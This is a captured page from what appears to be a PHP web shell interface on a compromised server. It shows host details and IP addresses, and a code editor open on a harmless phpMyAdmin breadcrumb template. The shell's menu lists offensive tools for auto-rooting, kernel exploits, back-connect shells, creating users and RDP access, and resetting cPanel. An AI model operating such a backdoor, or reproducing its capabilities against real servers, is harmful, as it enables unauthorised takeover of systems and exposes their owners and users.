Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
cwpsrv /
var /
services /
pma /
templates /
menu /
[ HOME SHELL ]
Name
Size
Permission
Action
breadcrumbs.twig
1.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : breadcrumbs.twig
<div id="floating_menubar"></div> <nav id="server-breadcrumb" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> {{ show_icons('TabsMode') ? get_image('s_host') }} <a href="{{ url(server.url) }}" data-raw-text="{{ server.name }}"> {% if show_text('TabsMode') %}{% trans 'Server:' %}{% endif %} {{ server.name }} </a> </li> {% if database is not empty %} <li class="breadcrumb-item"> {{ show_icons('TabsMode') ? get_image('s_db') }} <a href="{{ url(database.url, {'db': database.name}) }}" data-raw-text="{{ database.name }}"> {% if show_text('TabsMode') %}{% trans 'Database:' %}{% endif %} {{ database.name }} </a> </li> {% if table is not empty %} <li class="breadcrumb-item"> {{ show_icons('TabsMode') ? get_image(table.is_view ? 'b_views' : 's_tbl') }} <a href="{{ url(table.url, {'db': database.name, 'table': table.name}) }}" data-raw-text="{{ table.name }}"> {% if show_text('TabsMode') %} {% if table.is_view %} {% trans 'View:' %} {% else %} {% trans 'Table:' %} {% endif %} {% endif %} {{ table.name }} </a> </li> {% if table.comment is not empty %} <span class="breadcrumb-comment">“{{ table.comment }}”</span> {% endif %} {% elseif database.comment is not empty %} <span class="breadcrumb-comment">“{{ database.comment }}”</span> {% endif %} {% endif %} </ol> </nav>
Close